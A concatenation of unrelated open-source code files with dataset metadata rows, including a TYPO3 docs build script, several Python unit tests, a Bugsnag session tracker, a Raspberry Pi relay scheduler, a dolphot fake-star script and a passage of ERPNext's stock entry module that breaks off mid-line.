CONTINUE: loglist.append('PARAMS are ok') else: loglist.append('Bad PARAMS or nothing to do') # ================================================== # work # -------------------------------------------------- if exitcode == CONTINUE: resultdir = lookup(milestones, 'resultdir') if resultdir: TheProjectCacheDir = ospj(resultdir, 'Cache') if exitcode == CONTINUE: for option, default in general_int_options: v = findRunParameter(option, default) if v is not None: result['MILESTONES'].append({option: int(v)}) for option, default in general_string_options: v = findRunParameter(option, default) if v is not None: result['MILESTONES'].append({option: v}) for option, default in general_csvlist_options: v = findRunParameter(option, default) if v is not None: v = v.replace(' ', ',').split(',') v = [item for item in v if item] result['MILESTONES'].append({option: v}) if exitcode == CONTINUE: # Determine relative_part_of_builddir. # Example: typo3cms/Project/default/0.0.0 if not relative_part_of_builddir: if buildsettings_builddir.startswith(webroot_abspath): relative_part_of_builddir = buildsettings_builddir[len(webroot_abspath):] else: relative_part_of_builddir = buildsettings_builddir relative_part_of_builddir = relative_part_of_builddir.strip('/') SYMLINK_THE_MAKEDIR = ospj(makedir_abspath, 'SYMLINK_THE_MAKEDIR') SYMLINK_THE_OUTPUT = ospj(makedir_abspath, 'SYMLINK_THE_OUTPUT') SYMLINK_THE_PROJECT = ospj(makedir_abspath, 'SYMLINK_THE_PROJECT') # ================================================== # Set MILESTONE # -------------------------------------------------- if buildsettings_builddir: result['MILESTONES'].append({'buildsettings_builddir': buildsettings_builddir}) if checksum_ttl_seconds: result['MILESTONES'].append({'checksum_ttl_seconds': checksum_ttl_seconds}) if email_user_do_not_send: result['MILESTONES'].append({'email_user_do_not_send': email_user_do_not_send}) if email_user_receivers_exlude_list: result['MILESTONES'].append({'email_user_receivers_exlude_list': email_user_receivers_exlude_list}) if lockfile_ttl_seconds: result['MILESTONES'].append({'lockfile_ttl_seconds': lockfile_ttl_seconds}) if TheProjectCacheDir: result['MILESTONES'].append({'TheProjectCacheDir': TheProjectCacheDir}) if relative_part_of_builddir: result['MILESTONES'].append({'relative_part_of_builddir': relative_part_of_builddir}) if url_of_webroot: result['MILESTONES'].append({'url_of_webroot': url_of_webroot}) if webroot_abspath: result['MILESTONES'].append({'webroot_abspath': webroot_abspath}) if gitdir_must_start_with: result['MILESTONES'].append({'gitdir_must_start_with': gitdir_must_start_with}) if SYMLINK_THE_MAKEDIR: result['MILESTONES'].append({'SYMLINK_THE_MAKEDIR': SYMLINK_THE_MAKEDIR}) if SYMLINK_THE_OUTPUT: result['MILESTONES'].append({'SYMLINK_THE_OUTPUT': SYMLINK_THE_OUTPUT}) if SYMLINK_THE_PROJECT: result['MILESTONES'].append({'SYMLINK_THE_PROJECT': SYMLINK_THE_PROJECT}) # ================================================== # save result # -------------------------------------------------- tct.save_the_result(result, resultfile, params, facts, milestones, exitcode, CONTINUE, reason) # ================================================== # Return with proper exitcode # -------------------------------------------------- sys.exit(exitcode) """ [general] temp_home = /tmp toolchains_home = /ALL/Toolchains/ [default] buildsettings_builddir_root = /ALL/dummy_webroot webroot_part_of_builddir = /ALL/dummy_webroot webroot_abspath = /ALL/dummy_webroot htaccess_template_show_latest = /ALL/Makedir/_htaccess conf_py_masterfile = /ALL/Makedir/conf.py repositories_rootfolder = /tmp/T3REPOS extensions_rootfolder = /tmp/T3EXTENSIONS extensions_builddir_relpath = typo3cms/extensions drafts_builddir_relpath = typo3cms/drafts # override these on the commandline force_rebuild_needed = 1 make_latex = 0 make_package = 0 make_pdf = 0 make_singlehtml = 0 rebuild_needed = 1 replace_static_in_html = 0 talk = 1 # others email_admin = email_user_cc = email_user_bcc = lockfile_name = lockfile.json url_of_webroot = https://docs.typo3.org/ latex_contrib_typo3_folder = /ALL/Downloads/latex.typo3 email_user_send_to_admin_too = 0 email_user_to = email_user_do_not_send = 0 email_user_receivers_exlude_list = , smtp_host= """
mit
4,967,890,019,327,124,000
29.208333
135
0.62237
false
trnewman/VT-USRP-daughterboard-drivers_python
gr-usrp/src/qa_usrp.py
1
1235
#!/usr/bin/env python # # Copyright 2005 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # from gnuradio import gr, gr_unittest import usrp1 class qa_usrp (gr_unittest.TestCase): def setUp (self): self.fg = gr.flow_graph () def tearDown (self): self.fg = None def test_000_nop (self): """Just see if we can import the module... They may not have a USRP connected, etc. Don't try to run anything""" pass if __name__ == '__main__': gr_unittest.main ()
gpl-3.0
-927,789,237,548,357,000
29.875
78
0.692308
false
CCSS-CZ/layman
server/tests/layedtest.py
1
3969
import os,sys import unittest import ConfigParser TEST_DIR = os.path.dirname(os.path.abspath(__file__)) INSTALL_DIR = os.path.abspath(os.path.join(TEST_DIR,"..")) sys.path.append(os.path.join(INSTALL_DIR)) import json from layman.layed import LayEd from layman.layed import GsRest class LayEdTestCase(unittest.TestCase): """Test of the auth module""" le = None # LayEd workdir = None cfg = None def setUp(self): cfg = ConfigParser.SafeConfigParser() cfg.read((os.path.join(TEST_DIR,"tests.cfg"))) cfg.set("FileMan","testdir",TEST_DIR) self.le = LayEd(cfg) self.gsr = GsRest(cfg) self.config = cfg self.workdir = os.path.abspath(os.path.join(TEST_DIR,"workdir","data")) # TODO: add tests for POST /layed?myLayer def test_01_publish(self): # ff = "world_cities_point.shp" # file # ll = "world_cities_point" # layer # st = "world_cities_point" # style # ff = "pest.shp" # file # ll = "pest" # layer # st = "pest" # style ff = "line_crs.shp" # file ll = "line_crs" # layer st = "line_crs" # style ws = "mis" # workspace ds = "testschema" # datastore sch = "testschema" # schema # Check # # Check if the layer is not already there (head, cont) = self.gsr.getLayer(ws, ll) self.assertNotEquals("200", head["status"], "The layer already exists. Please, remove it manually." ) # Check if the style is not already there (head, cont) = self.gsr.getStyle(ws, st) self.assertNotEquals("200", head["status"], "The style already exists. Please, remove it manually." ) # Publish # self.le.publish(fsUserDir=self.workdir, fsGroupDir="", dbSchema=ds, gsWorkspace=ws, fileName=ff) # Test # # Check if the layer is there (head, cont) = self.gsr.getLayer(ws, ll) self.assertEquals("200", head["status"], "The layer is not there. Was it created under another name?") # Check the style of the layer layerJson = json.loads(cont) styleName = layerJson["layer"]["defaultStyle"]["name"] self.assertEquals(st, styleName, "The layer is there, but it has wrong style assinged.") # Check if the style is there (head, cont) = self.gsr.getStyle(ws, st) self.assertEquals("200", head["status"], "The style is not there." ) #def test_02_delete(self): # Checks # # Check that the layer is there #(head, cont) = self.gsr.getLayer("dragouni", "line_crs") #self.assertEquals("200", head["status"], "The layer line_crs is not there. Was it created under another name?") # Check that the style is there #(head, cont) = self.gsr.getStyle("dragouni", "line_crs") #self.assertEquals("200", head["status"], "The style line_crs is not there." ) # Delete # # Delete layer (including feature type, style and datastore) #self.le.deleteLayer(workspace="dragouni", layer="line_crs", deleteStore=True) # Test # # Check that the layer is not there #(head, cont) = self.gsr.getLayer("dragouni", "line_crs") #self.assertNotEquals("200", head["status"], "The layer line_crs still exists, should be already deleted." ) # Check that the style is not there #(head, cont) = self.gsr.getStyle("dragouni", "line_crs") #self.assertNotEquals("200", head["status"], "The style line_crs already exists, should be already deleted." ) # Check that the data store is not there #(head, cont) = self.gsr.getDataStore("dragouni", "line_crs") #self.assertNotEquals("200", head["status"], "The data store line_crs already exists, should be already deleted." ) if __name__ == "__main__": suite = unittest.TestLoader().loadTestsFromTestCase(LayEdTestCase) unittest.TextTestRunner(verbosity=2).run(suite)
gpl-3.0
-507,578,213,640,657,300
35.75
123
0.615772
false
NuttamonW/Archaeological
ElectricalConductivity/test/test_electrical_conductivity_dialog.py
1
1580
# coding=utf-8 """Dialog test. .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ __author__ = '[email protected]' __date__ = '2015-08-04' __copyright__ = 'Copyright 2015, Point & June' import unittest from PyQt4.QtGui import QDialogButtonBox, QDialog from electrical_conductivity_dialog import ElectricalConductivityDialog from utilities import get_qgis_app QGIS_APP = get_qgis_app() class ElectricalConductivityDialogTest(unittest.TestCase): """Test dialog works.""" def setUp(self): """Runs before each test.""" self.dialog = ElectricalConductivityDialog(None) def tearDown(self): """Runs after each test.""" self.dialog = None def test_dialog_ok(self): """Test we can click OK.""" button = self.dialog.button_box.button(QDialogButtonBox.Ok) button.click() result = self.dialog.result() self.assertEqual(result, QDialog.Accepted) def test_dialog_cancel(self): """Test we can click cancel.""" button = self.dialog.button_box.button(QDialogButtonBox.Cancel) button.click() result = self.dialog.result() self.assertEqual(result, QDialog.Rejected) if __name__ == "__main__": suite = unittest.makeSuite(ElectricalConductivityDialogTest) runner = unittest.TextTestRunner(verbosity=2) runner.run(suite)
gpl-3.0
3,035,364,062,915,412,000
27.727273
78
0.677848
false
bugsnag/bugsnag-python
bugsnag/sessiontracker.py
1
4934
from copy import deepcopy from uuid import uuid4 from time import strftime, gmtime from threading import Lock, Timer from typing import List, Dict, Callable import atexit try: from contextvars import ContextVar _session_info = ContextVar('bugsnag-session', default={}) # type: ignore except ImportError: from bugsnag.utils import ThreadContextVar # flake8: noqa _session_info = ThreadContextVar('bugsnag-session', default={}) # type: ignore from bugsnag.utils import package_version, FilterDict, SanitizingJSONEncoder from bugsnag.event import Event __all__ = [] # type: List[str] class SessionTracker: MAXIMUM_SESSION_COUNT = 100 SESSION_PAYLOAD_VERSION = "1.0" """ Session tracking class for Bugsnag """ def __init__(self, configuration): self.session_counts = {} # type: Dict[str, int] self.config = configuration self.mutex = Lock() self.auto_sessions = False self.delivery_thread = None def start_session(self): if not self.auto_sessions and self.config.auto_capture_sessions: self.auto_sessions = True self.__start_delivery() start_time = strftime('%Y-%m-%dT%H:%M:00', gmtime()) new_session = { 'id': uuid4().hex, 'startedAt': start_time, 'events': { 'handled': 0, 'unhandled': 0 } } _session_info.set(new_session) self.__queue_session(start_time) def send_sessions(self): self.mutex.acquire() try: sessions = [] for min_time, count in self.session_counts.items(): sessions.append({ 'startedAt': min_time, 'sessionsStarted': count }) self.session_counts = {} finally: self.mutex.release() self.__deliver(sessions) def __start_delivery(self): if self.delivery_thread is None: def deliver(): self.send_sessions() self.delivery_thread = Timer(30.0, deliver) self.delivery_thread.daemon = True self.delivery_thread.start() self.delivery_thread = Timer(30.0, deliver) self.delivery_thread.daemon = True self.delivery_thread.start() def cleanup(): if self.delivery_thread is not None: self.delivery_thread.cancel() self.send_sessions() atexit.register(cleanup) def __queue_session(self, start_time: str): self.mutex.acquire() try: if start_time not in self.session_counts: self.session_counts[start_time] = 0 self.session_counts[start_time] += 1 finally: self.mutex.release() def __deliver(self, sessions: List[Dict]): if not sessions: self.config.logger.debug("No sessions to deliver") return if not self.config.api_key: self.config.logger.debug( "Not delivering due to an invalid api_key" ) return if not self.config.should_notify(): self.config.logger.debug("Not delivering due to release_stages") return notifier_version = package_version('bugsnag') or 'unknown' payload = { 'notifier': { 'name': Event.NOTIFIER_NAME, 'url': Event.NOTIFIER_URL, 'version': notifier_version }, 'device': FilterDict({ 'hostname': self.config.hostname, 'runtimeVersions': self.config.runtime_versions }), 'app': { 'releaseStage': self.config.release_stage, 'version': self.config.app_version }, 'sessionCounts': sessions } try: encoder = SanitizingJSONEncoder( self.config.logger, separators=(',', ':'), keyword_filters=self.config.params_filters ) encoded_payload = encoder.encode(payload) self.config.delivery.deliver_sessions(self.config, encoded_payload) except Exception as e: self.config.logger.exception('Sending sessions failed %s', e) class SessionMiddleware: """ Session middleware ensures that a session is appended to the event. """ def __init__(self, bugsnag: Callable[[Event], Callable]): self.bugsnag = bugsnag def __call__(self, event: Event): session = _session_info.get() if session: if event.unhandled: session['events']['unhandled'] += 1 else: session['events']['handled'] += 1 event.session = deepcopy(session) self.bugsnag(event)
mit
8,336,604,068,259,510,000
30.031447
83
0.551074
false
BirchJD/RPiTimer
PiTimer_Step-4/Schedule.py
1
5941
# PiTimer - Python Hardware Programming Education Project For Raspberry Pi # Copyright (C) 2015 Jason Birch # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. #/****************************************************************************/ #/* PiTimer - Step 4 - Schedule functions. */ #/* ------------------------------------------------------------------------ */ #/* V1.00 - 2015-07-04 - Jason Birch */ #/* ------------------------------------------------------------------------ */ #/* Class to handle scheduling events for specific relays. Such as adding, */ #/* removing, displaying, sorting. */ #/****************************************************************************/ import datetime import ScheduleItem #/****************************************************************************/ #/* Function to return the schedule date of a schedule item for when sorting */ #/* the items using the Python list sort feature. */ #/****************************************************************************/ def SortGetKey(Object): return Object.GetScheduleDate() class Schedule: def __init__(self): # Define an array to store the schedule items in. self.ScheduleItems = [] #/*********************************************/ #/* Get the item at the specific array index. */ #/*********************************************/ def GetItem(self, ItemIndex): if len(self.ScheduleItems) > ItemIndex: return self.ScheduleItems[ItemIndex] else: return False #/**************************************************/ #/* Find the schedule item with the specificed ID. */ #/**************************************************/ def FindItem(self, FindItemID): ThisItem = False for ThisScheduleItem in self.ScheduleItems: if ThisScheduleItem.GetItemID() == FindItemID: ThisItem = ThisScheduleItem return ThisItem #/*******************************************************/ #/* Function to display the current schedule of events. */ #/* In a tabulated form. */ #/*******************************************************/ def DisplaySchedule(self, SelectedItemID): if len(self.ScheduleItems): self.ScheduleItems[0].DisplayHeader() for ThisScheduleItem in self.ScheduleItems: if SelectedItemID == ThisScheduleItem.GetItemID(): SelectLeftChar = ">" SelectRightChar = "<" else: SelectLeftChar = " " SelectRightChar = " " ThisScheduleItem.DisplayItem(SelectLeftChar, SelectRightChar) if len(self.ScheduleItems): self.ScheduleItems[0].DisplayFooter() #/*************************************************/ #/* Add a new schedule item to the schedle array. */ #/*************************************************/ def AddSchedule(self, NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat): self.ScheduleItems.append(ScheduleItem.ScheduleItem(NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat)) self.SortSchedule() #/**************************************************/ #/* Delete a schedule item from the schedle array. */ #/**************************************************/ def DelSchedule(self, ItemID): ThisScheduleItem = self.FindItem(ItemID) if ThisScheduleItem: self.ScheduleItems.remove(ThisScheduleItem) self.SortSchedule() #/*********************************************/ #/* Sort the list of schedule items so the */ #/* expired items are at the top of the list. */ #/*********************************************/ def SortSchedule(self): self.ScheduleItems.sort(key=SortGetKey) #/*************************************************************************/ #/* If the top schedule item is in the past return it's ID as being */ #/* triggered. The schedule items are kept in date order, so the top item */ #/* is the one which will trigger first. The calling function is */ #/* responsible for removing the triggered item from the scheduled items */ #/* or updating the scheduled item if the item is to be repeated once */ #/* the calling function has processed it; by calling the function: */ #/* SetNextScheduleDate(). */ #/*************************************************************************/ def ScheduleTrigger(self): ThisItemID = False Now = datetime.datetime.now() ThisItem = self.GetItem(0) if ThisItem and ThisItem.GetScheduleDate() <= Now: ThisItemID = ThisItem.GetItemID() return ThisItemID #/*********************************************************************/ #/* Set the date and time of the specified schedule item to it's next */ #/* trigger date/time. If the item does not have a repeat period, */ #/* remove the schedule item. */ #/*********************************************************************/ def SetNextScheduleDate(self, ThisItemID): ThisItem = self.FindItem(ThisItemID) if ThisItem and ThisItem.SetNextScheduleDate() == False: self.DelSchedule(ThisItemID) self.SortSchedule()
gpl-3.0
-9,058,749,069,529,155,000
40.838028
117
0.497391
false
dweisz/pydolphot
make_fakerun.py
1
2967
import numpy as np import sys import subprocess import os ''' def makephotfiles(base, nstart, nruns, nimages): for i in range(nstart,nstart+nruns): for j in range(1, nimages+1): subprocess.call("ln -s "+base+"."+np.str(j)+".res.fits " + base+"_"+np.str(i)+"."+np.str(j)+".res.fits", shell=True) subprocess.call("ln -s "+base+"."+np.str(j)+".psf.fits " + base+"_"+np.str(i)+"."+np.str(j)+".psf.fits", shell=True) subprocess.call("ln -s "+base+".info " + base+"_"+np.str(i)+".info", shell=True) subprocess.call("ln -s "+base+".apcor " + base+"_"+np.str(i)+".apcor", shell=True) subprocess.call("ln -s "+base+".psfs " + base+"_"+np.str(i)+".psfs", shell=True) subprocess.call("ln -s "+base+".columns " + base+"_"+np.str(i)+".columns", shell=True) subprocess.call("ln -s "+base + " " + base+"_"+np.str(i), shell=True) ''' def makefakelist(photfile, filter1, filter2, fmin, fmax, cmin, cmax, nruns, nstars=15000, nstart=1): for i in range(nstart, nstart+nruns): subprocess.call('fakelist '+ np.str(photfile) + ' ' + np.str(filter1) + ' ' + np.str(filter2) + ' ' + np.str(fmin) + ' ' + np.str(fmax) + ' ' + np.str(cmin) + ' ' + np.str(cmax) + ' ' + "-nstar=" + np.str(nstars) + "> fake.list_" + np.str(i), shell=True) subprocess.call('sleep 5', shell=True ) def makefakeparam(param_file, base, nruns, nstart=1): infile = param_file for i in range(nstart, nstart+nruns): fakeparam = "phot.fake_"+np.str(i)+".param" subprocess.call("cp "+infile+" "+fakeparam, shell=True) outfile = fakeparam f1 = open(fakeparam, 'a') f1.write("ACSuseCTE = 1\n") f1.write("WFC3useCTE = 1\n") f1.write("RandomFake = 1\n") f1.write("FakeMatch=3.0\n") f1.write("FakePad=0\n") f1.write("FakeStarPSF = 1.5\n") f1.write("FakeOut="+base+"_fake_"+np.str(i)+".fake\n") f1.write("FakeStars=fake.list_"+np.str(i)+"\n") f1.close() def makerunfake(param_file, base, nruns, nstart=1): for i in range(nstart, nstart+nruns): fakeparam = "phot.fake_"+np.str(i)+".param" outfile = "runfake"+np.str(i) f = open(outfile, 'w') f.write("cd " + os.getcwd()+"\n") f.write("dolphot " + base+ " -p" + fakeparam + " >> fake.log_"+np.str(i)) f.close() subprocess.call("chmod +x " + outfile, shell=True) ''' cd /clusterfs/dweisz/photometry/leop/ dolphot leop_acs.phot_1 -pleop.fake.param_1 >> fake1.log ''' #if __name__ == '__main__': base = sys.argv[1] # e.g., test.phot #rundir = sys.argv[2] #nimages = np.int(sys.argv[3]) #name = sys.argv[3] param_file = sys.argv[2] # name of photometry parameter file nruns = np.int(sys.argv[3]) filters = sys.argv[4] f1min = np.float(sys.argv[5]) f1max = np.float(sys.argv[6]) c1min = np.float(sys.argv[7]) c1max = np.float(sys.argv[8]) #nimages = 12 #nruns = 72 #makephotfiles(base, 1, nruns , nimages) makefakeparam(param_file, base, nruns) makerunfake(param_file, base, nruns) makefakelist(base, filters.split()[0], filters.split()[1], f1min, f1max, c1min, c1max, nruns) #main()
mit
4,988,895,559,438,587,000
31.25
256
0.624874
false
collab-project/luma.cryptocurrency
luma/cryptocurrency/endpoint/coinmarketcap.py
1
1134
# -*- coding: utf-8 -*- # Copyright (c) 2017 Thijs Triemstra and contributors # See LICENSE.rst for details. """ Endpoint for coinmarketcap.com :see: https://coinmarketcap.com/api/ """ from datetime import datetime from dateutil.tz.tz import tzutc from . import Endpoint, EndpointResponse class CoinmarketcapResponse(EndpointResponse): @property def data(self): return self.json_data[0] def parse_price(self): return float(self.data.get('price_{}'.format( self.currency_code.lower()))) def parse_price_in_btc(self): return float(self.data.get('price_btc')) def parse_timestamp(self): return datetime.fromtimestamp( int(self.data.get('last_updated')), tz=tzutc()) class Coinmarketcap(Endpoint): responseType = CoinmarketcapResponse def get_url(self): base = 'https://api.coinmarketcap.com/{api_version}/ticker/{coin}/' if self.currency_code != 'USD': base += '?convert={}'.format(self.currency_code) return base.format( api_version=self.api_version, coin=self.coin )
mit
1,155,416,785,745,923,300
22.625
75
0.640212
false
rohitwaghchaure/New_Theme_Erp
erpnext/stock/doctype/stock_entry/stock_entry.py
1
34617
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe import frappe.defaults from frappe.utils import cstr, cint, flt, comma_or, nowdate from frappe import _ from erpnext.stock.utils import get_incoming_rate from erpnext.stock.stock_ledger import get_previous_sle from erpnext.controllers.queries import get_match_cond from erpnext.stock.get_item_details import get_available_qty class NotUpdateStockError(frappe.ValidationError): pass class StockOverReturnError(frappe.ValidationError): pass class IncorrectValuationRateError(frappe.ValidationError): pass class DuplicateEntryForProductionOrderError(frappe.ValidationError): pass from erpnext.controllers.stock_controller import StockController form_grid_templates = { "mtn_details": "templates/form_grid/stock_entry_grid.html" } class StockEntry(StockController): fname = 'mtn_details' def onload(self): if self.docstatus==1: for item in self.get(self.fname): item.update(get_available_qty(item.item_code, item.s_warehouse)) def validate(self): self.validate_posting_time() self.validate_purpose() pro_obj = self.production_order and \ frappe.get_doc('Production Order', self.production_order) or None self.set_transfer_qty() self.validate_item() self.validate_uom_is_integer("uom", "qty") self.validate_uom_is_integer("stock_uom", "transfer_qty") self.validate_warehouse(pro_obj) self.validate_production_order(pro_obj) self.get_stock_and_rate() self.validate_incoming_rate() self.validate_bom() self.validate_finished_goods() self.validate_return_reference_doc() self.validate_with_material_request() self.validate_fiscal_year() self.validate_valuation_rate() self.set_total_amount() def on_submit(self): from erpnext.stock.stock_custom_methods import validate_for_si_submitted validate_for_si_submitted(self) self.update_stock_ledger() from erpnext.stock.doctype.serial_no.serial_no import update_serial_nos_after_submit update_serial_nos_after_submit(self, "mtn_details") self.update_production_order() self.make_gl_entries() def on_cancel(self): self.update_stock_ledger() self.update_production_order() self.make_gl_entries_on_cancel() def validate_fiscal_year(self): from erpnext.accounts.utils import validate_fiscal_year validate_fiscal_year(self.posting_date, self.fiscal_year, self.meta.get_label("posting_date")) def validate_purpose(self): valid_purposes = ["Material Issue", "Material Receipt", "Material Transfer", "Manufacture/Repack", "Subcontract", "Sales Return", "Purchase Return"] if self.purpose not in valid_purposes: frappe.throw(_("Purpose must be one of {0}").format(comma_or(valid_purposes))) def set_transfer_qty(self): for item in self.get("mtn_details"): if not flt(item.qty): frappe.throw(_("Row {0}: Qty is mandatory").format(item.idx)) item.transfer_qty = flt(item.qty * item.conversion_factor, self.precision("transfer_qty", item)) def validate_item(self): stock_items = self.get_stock_items() serialized_items = self.get_serialized_items() for item in self.get("mtn_details"): if item.item_code not in stock_items: frappe.throw(_("{0} is not a stock Item").format(item.item_code)) if not item.stock_uom: item.stock_uom = frappe.db.get_value("Item", item.item_code, "stock_uom") if not item.uom: item.uom = item.stock_uom if not item.conversion_factor: item.conversion_factor = 1 if not item.transfer_qty: item.transfer_qty = item.qty * item.conversion_factor if (self.purpose in ("Material Transfer", "Sales Return", "Purchase Return") and not item.serial_no and item.item_code in serialized_items): frappe.throw(_("Row #{0}: Please specify Serial No for Item {1}").format(item.idx, item.item_code), frappe.MandatoryError) def validate_warehouse(self, pro_obj): """perform various (sometimes conditional) validations on warehouse""" source_mandatory = ["Material Issue", "Material Transfer", "Purchase Return"] target_mandatory = ["Material Receipt", "Material Transfer", "Sales Return"] validate_for_manufacture_repack = any([d.bom_no for d in self.get("mtn_details")]) if self.purpose in source_mandatory and self.purpose not in target_mandatory: self.to_warehouse = None for d in self.get('mtn_details'): d.t_warehouse = None elif self.purpose in target_mandatory and self.purpose not in source_mandatory: self.from_warehouse = None for d in self.get('mtn_details'): d.s_warehouse = None for d in self.get('mtn_details'): if not d.s_warehouse and not d.t_warehouse: d.s_warehouse = self.from_warehouse d.t_warehouse = self.to_warehouse if not (d.s_warehouse or d.t_warehouse): frappe.throw(_("Atleast one warehouse is mandatory")) if self.purpose in source_mandatory and not d.s_warehouse: frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx)) if self.purpose in target_mandatory and not d.t_warehouse: frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx)) if self.purpose == "Manufacture/Repack": if validate_for_manufacture_repack: if d.bom_no: d.s_warehouse = None if not d.t_warehouse: frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx)) elif pro_obj and cstr(d.t_warehouse) != pro_obj.fg_warehouse: frappe.throw(_("Target warehouse in row {0} must be same as Production Order").format(d.idx)) else: d.t_warehouse = None if not d.s_warehouse: frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx)) if cstr(d.s_warehouse) == cstr(d.t_warehouse): frappe.throw(_("Source and target warehouse cannot be same for row {0}").format(d.idx)) def validate_production_order(self, pro_obj=None): if not pro_obj: if self.production_order: pro_obj = frappe.get_doc('Production Order', self.production_order) else: return if self.purpose == "Manufacture/Repack": # check for double entry self.check_duplicate_entry_for_production_order() elif self.purpose != "Material Transfer": self.production_order = None def check_duplicate_entry_for_production_order(self): other_ste = [t[0] for t in frappe.db.get_values("Stock Entry", { "production_order": self.production_order, "purpose": self.purpose, "docstatus": ["!=", 2], "name": ["!=", self.name] }, "name")] if other_ste: production_item, qty = frappe.db.get_value("Production Order", self.production_order, ["production_item", "qty"]) args = other_ste + [production_item] fg_qty_already_entered = frappe.db.sql("""select sum(transfer_qty) from `tabStock Entry Detail` where parent in (%s) and item_code = %s and ifnull(s_warehouse,'')='' """ % (", ".join(["%s" * len(other_ste)]), "%s"), args)[0][0] if fg_qty_already_entered >= qty: frappe.throw(_("Stock Entries already created for Production Order ") + self.production_order + ":" + ", ".join(other_ste), DuplicateEntryForProductionOrderError) def validate_valuation_rate(self): if self.purpose == "Manufacture/Repack": valuation_at_source, valuation_at_target = 0, 0 for d in self.get("mtn_details"): if d.s_warehouse and not d.t_warehouse: valuation_at_source += flt(d.amount) if d.t_warehouse and not d.s_warehouse: valuation_at_target += flt(d.amount) if valuation_at_target < valuation_at_source: frappe.throw(_("Total valuation for manufactured or repacked item(s) can not be less than total valuation of raw materials")) def set_total_amount(self): self.total_amount = sum([flt(item.amount) for item in self.get("mtn_details")]) def get_stock_and_rate(self, force=False): """get stock and incoming rate on posting date""" raw_material_cost = 0.0 if not self.posting_date or not self.posting_time: frappe.throw(_("Posting date and posting time is mandatory")) allow_negative_stock = cint(frappe.db.get_default("allow_negative_stock")) for d in self.get('mtn_details'): args = frappe._dict({ "item_code": d.item_code, "warehouse": d.s_warehouse or d.t_warehouse, "posting_date": self.posting_date, "posting_time": self.posting_time, "qty": d.s_warehouse and -1*d.transfer_qty or d.transfer_qty, "serial_no": d.serial_no }) # get actual stock at source warehouse d.actual_qty = get_previous_sle(args).get("qty_after_transaction") or 0 # validate qty during submit if d.docstatus==1 and d.s_warehouse and not allow_negative_stock and d.actual_qty < d.transfer_qty: frappe.throw(_("""Row {0}: Qty not avalable in warehouse {1} on {2} {3}. Available Qty: {4}, Transfer Qty: {5}""").format(d.idx, d.s_warehouse, self.posting_date, self.posting_time, d.actual_qty, d.transfer_qty)) # get incoming rate if not d.bom_no: if not flt(d.incoming_rate) or d.s_warehouse or self.purpose == "Sales Return" or force: incoming_rate = flt(self.get_incoming_rate(args), self.precision("incoming_rate", d)) if incoming_rate > 0: d.incoming_rate = incoming_rate d.amount = flt(d.transfer_qty) * flt(d.incoming_rate) if not d.t_warehouse: raw_material_cost += flt(d.amount) # set incoming rate for fg item if self.purpose == "Manufacture/Repack": number_of_fg_items = len([t.t_warehouse for t in self.get("mtn_details") if t.t_warehouse]) for d in self.get("mtn_details"): if d.bom_no or (d.t_warehouse and number_of_fg_items == 1): if not flt(d.incoming_rate) or force: operation_cost_per_unit = 0 if d.bom_no: bom = frappe.db.get_value("BOM", d.bom_no, ["operating_cost", "quantity"], as_dict=1) operation_cost_per_unit = flt(bom.operating_cost) / flt(bom.quantity) d.incoming_rate = operation_cost_per_unit + (raw_material_cost / flt(d.transfer_qty)) d.amount = flt(d.transfer_qty) * flt(d.incoming_rate) break def get_incoming_rate(self, args): incoming_rate = 0 if self.purpose == "Sales Return": incoming_rate = self.get_incoming_rate_for_sales_return(args) else: incoming_rate = get_incoming_rate(args) return incoming_rate def get_incoming_rate_for_sales_return(self, args): incoming_rate = 0.0 if (self.delivery_note_no or self.sales_invoice_no) and args.get("item_code"): incoming_rate = frappe.db.sql("""select abs(ifnull(stock_value_difference, 0) / actual_qty) from `tabStock Ledger Entry` where voucher_type = %s and voucher_no = %s and item_code = %s limit 1""", ((self.delivery_note_no and "Delivery Note" or "Sales Invoice"), self.delivery_note_no or self.sales_invoice_no, args.item_code)) incoming_rate = incoming_rate[0][0] if incoming_rate else 0.0 return incoming_rate def validate_incoming_rate(self): for d in self.get('mtn_details'): if d.t_warehouse: self.validate_value("incoming_rate", ">", 0, d, raise_exception=IncorrectValuationRateError) def validate_bom(self): for d in self.get('mtn_details'): if d.bom_no and not frappe.db.sql("""select name from `tabBOM` where item = %s and name = %s and docstatus = 1 and is_active = 1""", (d.item_code, d.bom_no)): frappe.throw(_("BOM {0} is not submitted or inactive BOM for Item {1}").format(d.bom_no, d.item_code)) def validate_finished_goods(self): """validation: finished good quantity should be same as manufacturing quantity""" for d in self.get('mtn_details'): if d.bom_no and flt(d.transfer_qty) != flt(self.fg_completed_qty): frappe.throw(_("Quantity in row {0} ({1}) must be same as manufactured quantity {2}").format(d.idx, d.transfer_qty, self.fg_completed_qty)) def validate_return_reference_doc(self): """validate item with reference doc""" ref = get_return_doc_and_details(self) if ref.doc: # validate docstatus if ref.doc.docstatus != 1: frappe.throw(_("{0} {1} must be submitted").format(ref.doc.doctype, ref.doc.name), frappe.InvalidStatusError) # update stock check if ref.doc.doctype == "Sales Invoice" and cint(ref.doc.update_stock) != 1: frappe.throw(_("'Update Stock' for Sales Invoice {0} must be set").format(ref.doc.name), 